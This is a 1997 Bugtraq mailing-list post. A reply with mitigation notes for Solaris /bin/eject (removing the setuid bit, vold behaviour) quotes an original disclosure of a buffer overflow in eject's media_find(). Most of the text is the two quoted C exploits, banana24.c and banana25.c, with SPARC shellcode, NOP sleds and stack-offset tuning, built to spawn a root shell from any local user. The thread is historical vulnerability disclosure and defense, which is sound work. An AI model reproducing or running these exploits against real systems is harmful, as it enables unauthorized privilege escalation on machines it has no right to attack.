[4162] in bugtraq
Re: Exploit for buffer overflow in /bin/eject - Solaris 2.X -
daemon@ATHENA.MIT.EDU (Jonathan Sturges)
Fri Mar 14 01:06:42 1997
Date: Thu, 13 Mar 1997 17:44:58 -0500
Reply-To: Jonathan Sturges <jonathan@CC.ODU.EDU>
From: Jonathan Sturges <jonathan@CC.ODU.EDU>
X-To: Cristian SCHIPOR <skipo@SUNDY.CS.PUB.RO>
To: BUGTRAQ@NETSPACE.ORG
In-Reply-To: <Pine.GSO.3.95.970313211326.23406A-100000@sundy.cs.pub.ro>
Hi,
I was just testing this on my Solaris 2.5 (SPARC) boxes. And, it appears
that if you're running Volume Management (vold), that eject doesn't need
to be set-UID anyway.
Here's what I did:
* chmod 555 /usr/bin/eject (hard-linked to /bin/eject). This
immediately protects you from the exploits.
* If volume management is running (/usr/ucb/ps -auxww | grep vold), you
can still eject BOTH CD's and floppies.
* If volume management is NOT running, you CANNOT eject the CD (device
permissions are 640), but you CAN still eject a floppy (perms are 666).
These permissions seem to be the default permissions on Solaris SPARC 2.5
and 2.5.1.
Running the exploits, below, will only pop you a shell as yourself, of
course, once /usr/bin/eject has perms. 555.
thanks for pointing this hole out!!!
-Jonathan
On Thu, 13 Mar 1997, Cristian SCHIPOR wrote:
> motto: "Mihai Eminescu was a good friend of Ion Creanga"
>
> Thu Mar 13 21:01:00 EET 1997 - Romania
>
> "Hole in /bin/eject - buffer overflow"
>
> I exploited the buffer overflow hole in /bin/eject on Solaris 2.X (who
> have suid exec bit and is owned by root). The buffer overflow problem
> appears in an internal function media_find(). The result is: any user can
> gain root shell. So, to prevent /bin/eject exploit, you have to get out
> suid-exec bit from /bin/eject (that's very simple) and compile a little
> program like:
>
> main()
> {execl("/bin/eject","eject","floppy",(char *)0);}
>
> That allows your work station ordinary users to eject floppy (thats the main
> task for eject).
>
> I wrote two exploits (Solaris 2.4 & 2.5.1). My exploit for Solaris 2.4
> looks a bit ugly - the buffer is two short - but it works.
> For both exploits argv[1] can change the STACK_OFFSET value (for
> troubleshotings +- 8 .. +-64 .. the step is 8).
> The interesting thing about this exploit it worked on some machines where
> it was installed some stuff to make inofensiv buffer overflows exploits ...
>
> Ok you have right down two exploits.
> For future I'm planing a web page with security stuff for Solaris so try
> http://www.math.pub.ro/security.
>
> Cristian Schipor - Computer Science Faculty - Bucharest - Romania
> E-mail: skipo@sundy.cs.pub.ro, skipo@math.pub.ro, skipo@ns.ima.ro
> Phone: 401-410.60.88
>
> ------------------------ banana24.c -----------------------------
> /* For Solaris 2.4 */
>
> #include <stdio.h>
> #include <stdlib.h>
> #include <sys/types.h>
> #include <unistd.h>
>
> #define BUF_LENGTH 264
> #define EXTRA 36
> #define STACK_OFFSET 8
> #define SPARC_NOP 0xc013a61c
>
> u_char sparc_shellcode[] =
>
> "\xc0\x13\x2d\x0b\xd8\x9a\xac\x15\xa1\x6e\x2f\x0b\xda\xdc\xae\x15\xe3\x68"
> "\x90\x0b\x80\x0e\x92\x03\xa0\x0c\x94\x1a\x80\x0a\x9c\x03\xa0\x14"
> "\xec\x3b\xbf\xec\xc0\x23\xbf\xf4\xdc\x23\xbf\xf8\xc0\x23\xbf\xfc"
> "\x82\x10\x20\x3b\x91\xd0\x20\x08\x90\x1b\xc0\x0f\x82\x10\x20\x01"
> "\x91\xd0"/*\x20\x08"*/
> ;
>
> u_long get_sp(void)
> {
> __asm__("mov %sp,%i0 \n");
> }
>
> void main(int argc, char *argv[])
> {
> char buf[BUF_LENGTH + EXTRA + 8];
> long targ_addr;
> u_long *long_p;
> u_char *char_p;
> int i, code_length = strlen(sparc_shellcode),dso=0;
>
> if(argc > 1) dso=atoi(argv[1]);
>
> long_p =(u_long *) buf ;
> targ_addr = get_sp() - STACK_OFFSET - dso;
>
> for (i = 0; i < (BUF_LENGTH - code_length) / sizeof(u_long); i++)
> *long_p++ = SPARC_NOP;
>
> char_p = (u_char *) long_p;
>
> for (i = 0; i < code_length; i++)
> *char_p++ = sparc_shellcode[i];
>
> long_p = (u_long *) char_p;
>
> for (i = 0; i < EXTRA / sizeof(u_long); i++)
> *long_p++ =targ_addr;
>
> printf("Jumping to address 0x%lx B[%d] E[%d] SO[%d]\n",
> targ_addr,BUF_LENGTH,EXTRA,STACK_OFFSET);
> execl("/bin/eject", "eject", & buf,(char *) 0);
> perror("execl failed");
> }
> ------------------------- end of banana24.c ------------------------
>
> ------------------------- banana25.c -------------------------------
> /* Wrote for Solaris 2.5.1 */
>
> #include <stdio.h>
> #include <stdlib.h>
> #include <sys/types.h>
> #include <unistd.h>
>
> #define BUF_LENGTH 364
> #define EXTRA 400
> #define STACK_OFFSET 400
> #define SPARC_NOP 0xa61cc013
>
> u_char sparc_shellcode[] =
>
> "\x2d\x0b\xd8\x9a\xac\x15\xa1\x6e\x2f\x0b\xda\xdc\xae\x15\xe3\x68"
> "\x90\x0b\x80\x0e\x92\x03\xa0\x0c\x94\x1a\x80\x0a\x9c\x03\xa0\x14"
> "\xec\x3b\xbf\xec\xc0\x23\xbf\xf4\xdc\x23\xbf\xf8\xc0\x23\xbf\xfc"
> "\x82\x10\x20\x3b\x91\xd0\x20\x08\x90\x1b\xc0\x0f\x82\x10\x20\x01"
> "\x91\xd0\x20\x08"
> ;
>
> u_long get_sp(void)
> {
> __asm__("mov %sp,%i0 \n");
> }
>
> void main(int argc, char *argv[])
> {
> char buf[BUF_LENGTH + EXTRA + 8];
> long targ_addr;
> u_long *long_p;
> u_char *char_p;
> int i, code_length = strlen(sparc_shellcode),dso=0;
>
> if(argc > 1) dso=atoi(argv[1]);
>
> long_p =(u_long *) buf ;
> targ_addr = get_sp() - STACK_OFFSET - dso;
> for (i = 0; i < (BUF_LENGTH - code_length) / sizeof(u_long); i++)
> *long_p++ = SPARC_NOP;
>
> char_p = (u_char *) long_p;
>
> for (i = 0; i < code_length; i++)
> *char_p++ = sparc_shellcode[i];
>
> long_p = (u_long *) char_p;
>
> for (i = 0; i < EXTRA / sizeof(u_long); i++)
> *long_p++ =targ_addr;
>
> printf("Jumping to address 0x%lx B[%d] E[%d] SO[%d]\n",
> targ_addr,BUF_LENGTH,EXTRA,STACK_OFFSET);
> execl("/bin/eject", "eject", & buf[1],(char *) 0);
> perror("execl failed");
> }
> ---------------------------- end of banana25.c ------------------------
>
